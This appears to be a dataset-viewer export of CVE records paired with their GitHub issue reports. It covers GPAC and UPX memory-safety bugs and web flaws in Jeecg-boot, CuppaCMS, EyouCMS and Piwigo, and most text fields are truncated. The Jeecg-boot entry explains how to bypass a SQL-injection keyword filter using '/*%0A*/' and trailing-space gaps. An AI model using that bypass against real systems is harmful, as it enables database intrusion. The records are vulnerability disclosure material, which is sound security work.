cve_id stringlengths 13 16 | cve_published stringlengths 23 23 | cve_descriptions stringlengths 48 2.08k | cve_metrics dict | cve_references listlengths 1 138 | cve_configurations listlengths 1 39 | url stringlengths 37 77 | cve_tags listlengths 1 4 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 88.6k ⌀ | issue_title stringlengths 3 335 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 146 | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 104M 2.09B | issue_number int64 1 122k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2022-47657 | 2023-01-05T16:15:10.233 | GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2355"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2355 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough info... | buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662 | https://api.github.com/repos/gpac/gpac/issues/2355/comments | 0 | 2022-12-17T10:31:33Z | 2022-12-17T11:29:28Z | https://github.com/gpac/gpac/issues/2355 | 1,501,315,271 | 2,355 |
CVE-2022-47658 | 2023-01-05T16:15:10.447 | GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2356"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2356 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough info... | buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 | https://api.github.com/repos/gpac/gpac/issues/2356/comments | 0 | 2022-12-17T10:31:37Z | 2022-12-17T11:29:29Z | https://github.com/gpac/gpac/issues/2356 | 1,501,315,341 | 2,356 |
CVE-2022-47659 | 2023-01-05T16:15:10.670 | GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2354"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2354 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough info... | stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data | https://api.github.com/repos/gpac/gpac/issues/2354/comments | 0 | 2022-12-17T10:31:30Z | 2022-12-17T11:29:28Z | https://github.com/gpac/gpac/issues/2354 | 1,501,315,203 | 2,354 |
CVE-2022-47660 | 2023-01-05T16:15:10.890 | GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2357"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2357 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough info... | integer overflow in isomedia/isom_write.c:4931 | https://api.github.com/repos/gpac/gpac/issues/2357/comments | 0 | 2022-12-17T10:31:40Z | 2022-12-17T11:29:29Z | https://github.com/gpac/gpac/issues/2357 | 1,501,315,390 | 2,357 |
CVE-2022-47661 | 2023-01-05T16:15:11.103 | GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2358"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2358 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels,
# Description
heap-buffer-overf... | heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes | https://api.github.com/repos/gpac/gpac/issues/2358/comments | 0 | 2022-12-18T10:23:38Z | 2022-12-19T11:26:12Z | https://github.com/gpac/gpac/issues/2358 | 1,501,850,698 | 2,358 |
CVE-2022-47662 | 2023-01-05T16:15:11.400 | GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2359"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2359 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels,
# Description
segment fault (/s... | Infinite recursion in Media_GetSample isomedia/media.c:662 | https://api.github.com/repos/gpac/gpac/issues/2359/comments | 0 | 2022-12-18T10:23:42Z | 2022-12-19T11:26:12Z | https://github.com/gpac/gpac/issues/2359 | 1,501,850,761 | 2,359 |
CVE-2022-47663 | 2023-01-05T16:15:11.623 | GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2360"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5411"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": n... | https://github.com/gpac/gpac/issues/2360 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | - [X] I looked for a similar issue and couldn't find any.
- [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels,
# Description
buffer overflow i... | buffer overflow in h263dmx_process filters/reframe_h263.c:609 | https://api.github.com/repos/gpac/gpac/issues/2360/comments | 0 | 2022-12-18T10:23:45Z | 2022-12-19T11:26:13Z | https://github.com/gpac/gpac/issues/2360 | 1,501,850,806 | 2,360 |
CVE-2023-23456 | 2023-01-12T19:15:24.693 | A heap-based buffer overflow issue was discovered in UPX in PackTmt::pack() in p_tmt.cpp file. The flow allows an attacker to cause a denial of service (abort) via a crafted file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160381"
},
{
"source": "patrick@puiterwijk.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB529776-278E-419A-B8E1-F7A101A77E24",
"versionEndExcluding": "2022-11-24",
"versionEndIncluding": null,
"versionStartEx... | https://github.com/upx/upx/issues/632 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"upx",
"upx"
] | <!---
IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE.
Just read it and fill in the details we're asking, it saves so much of our time. Thanks!
-->
## What's the problem (or question)?
<!--- If describing a bug, tell us what happens instead of the expected behavior -->
<!--- If suggest... | heap-buffer-overflow in PackTmt::pack | https://api.github.com/repos/upx/upx/issues/632/comments | 1 | 2022-11-24T06:26:03Z | 2022-11-27T23:14:58Z | https://github.com/upx/upx/issues/632 | 1,462,826,378 | 632 |
CVE-2023-23457 | 2023-01-12T19:15:24.810 | A Segmentation fault was found in UPX in PackLinuxElf64::invert_pt_dynamic() in p_lx_elf.cpp. An attacker with a crafted input file allows invalid memory address access that could lead to a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "patrick@puiterwijk.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2160382"
},
{
"source": "patrick@puiterwijk.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"u... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "191334EB-C1FD-4A4C-A48A-139452FD5DF4",
"versionEndExcluding": "2022-11-23",
"versionEndIncluding": null,
"versionStartEx... | https://github.com/upx/upx/issues/631 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"upx",
"upx"
] | This issue tracker is **ONLY** used for reporting bugs.
Please use [stackoverflow](https://stackoverflow.com) for supporting issues.
<!---
IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE.
Just read it and fill in the details we're asking, it saves so much of our time. Thanks!
-->
## ... | SEGV on PackLinuxElf64::invert_pt_dynamic | https://api.github.com/repos/upx/upx/issues/631/comments | 1 | 2022-11-24T02:21:53Z | 2022-11-27T23:16:30Z | https://github.com/upx/upx/issues/631 | 1,462,658,711 | 631 |
CVE-2022-47105 | 2023-01-19T16:15:11.277 | Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4393"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7BB811AB-8B4F-4A5A-8851-B617184A298A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/jeecgboot/jeecg-boot/issues/4393 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### 版本号:3.4.4
##### 前端版本:vue2版
##### 问题描述:sql注入检测代码存在绕过.
##### 截图&代码:
SqlInjectionUtil类中sql的注释正则为
```java
private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/");
```
.无法匹配到%0A, 导致可以利用/\*%0A\*/绕过
关键字检测后存在空格,导致绕过
```java
private final static String XSS_STR = "and |extractvalue|u... | jeecg-boot3.4.4 存在sql注入漏洞 | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4393/comments | 2 | 2022-12-10T09:17:39Z | 2022-12-23T06:03:37Z | https://github.com/jeecgboot/JeecgBoot/issues/4393 | 1,488,266,227 | 4,393 |
CVE-2021-29368 | 2023-01-20T19:15:13.250 | Session fixation vulnerability in CuppaCMS thru commit 4c9b742b23b924cf4c1f943f48b278e06a17e297 on November 12, 2019 allows attackers to gain access to arbitrary user sessions. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/CuppaCMS/CuppaCMS/issues/8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "25182935-24F3-4028-A4E5-95BB51377EB7",
"versionEndExcluding": null,
"versionEndIncluding": "2019-11-12",
"versionStart... | https://github.com/CuppaCMS/CuppaCMS/issues/8 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | **Cuppa CMS is prone to a session fixation attack.**
Description: Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, ... | Session Fixation in CuppaCMS | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/8/comments | 1 | 2020-06-16T17:01:59Z | 2020-07-01T14:53:11Z | https://github.com/CuppaCMS/CuppaCMS/issues/8 | 639,831,189 | 8 |
CVE-2022-45537 | 2023-01-20T19:15:16.093 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article publish component in cookie "ENV_LIST_URL". | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcludi... | https://github.com/weng-xianhu/eyoucms/issues/34 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article publish with reflected-XSS in the ... | Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/34/comments | 1 | 2022-11-14T08:44:20Z | 2023-02-20T10:13:49Z | https://github.com/weng-xianhu/eyoucms/issues/34 | 1,447,630,496 | 34 |
CVE-2022-45538 | 2023-01-20T19:15:16.160 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article publish component in cookie "ENV_GOBACK_URL". | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/35"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcludi... | https://github.com/weng-xianhu/eyoucms/issues/35 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article publish with reflected-XSS in the ... | Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/35/comments | 1 | 2022-11-14T08:49:28Z | 2023-02-20T10:13:18Z | https://github.com/weng-xianhu/eyoucms/issues/35 | 1,447,638,304 | 35 |
CVE-2022-45539 | 2023-01-20T19:15:16.223 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in FileManager component in GET value "activepath" when creating a new file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/38"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcludi... | https://github.com/weng-xianhu/eyoucms/issues/38 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background file adding with reflected-XSS in the get ... | Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/38/comments | 1 | 2022-11-14T09:06:48Z | 2023-02-20T08:22:13Z | https://github.com/weng-xianhu/eyoucms/issues/38 | 1,447,664,065 | 38 |
CVE-2022-45540 | 2023-01-20T19:15:16.287 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in article type editor component in POST value "name" if the value contains a malformed UTF-8 char. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/37"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcludi... | https://github.com/weng-xianhu/eyoucms/issues/37 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article type adding with reflected-XSS in ... | Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/37/comments | 1 | 2022-11-14T09:00:48Z | 2023-02-20T08:36:11Z | https://github.com/weng-xianhu/eyoucms/issues/37 | 1,447,653,340 | 37 |
CVE-2022-45541 | 2023-01-20T19:15:16.347 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article attribute editor component in POST value "value" if the value contains a non-integer char. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/36"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcludi... | https://github.com/weng-xianhu/eyoucms/issues/36 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background article attribute type changing with refle... | Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/36/comments | 1 | 2022-11-14T08:56:29Z | 2023-02-20T10:01:25Z | https://github.com/weng-xianhu/eyoucms/issues/36 | 1,447,647,465 | 36 |
CVE-2022-45542 | 2023-01-20T19:15:16.400 | EyouCMS <= 1.6.0 was discovered a reflected-XSS in the FileManager component in GET parameter "filename" when editing any file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0",
"versionStartExcludi... | https://github.com/weng-xianhu/eyoucms/issues/33 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | ## Background of Website Reflected Cross-Site Scripting
### Influenced Version
<= 1.6.0-UTF8-SP1
<img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png">
### Description
Background file management editor with reflected-XSS ... | Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting | https://api.github.com/repos/weng-xianhu/eyoucms/issues/33/comments | 1 | 2022-11-14T08:34:33Z | 2023-02-20T10:49:48Z | https://github.com/weng-xianhu/eyoucms/issues/33 | 1,447,617,306 | 33 |
CVE-2022-48007 | 2023-01-27T18:15:14.947 | A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
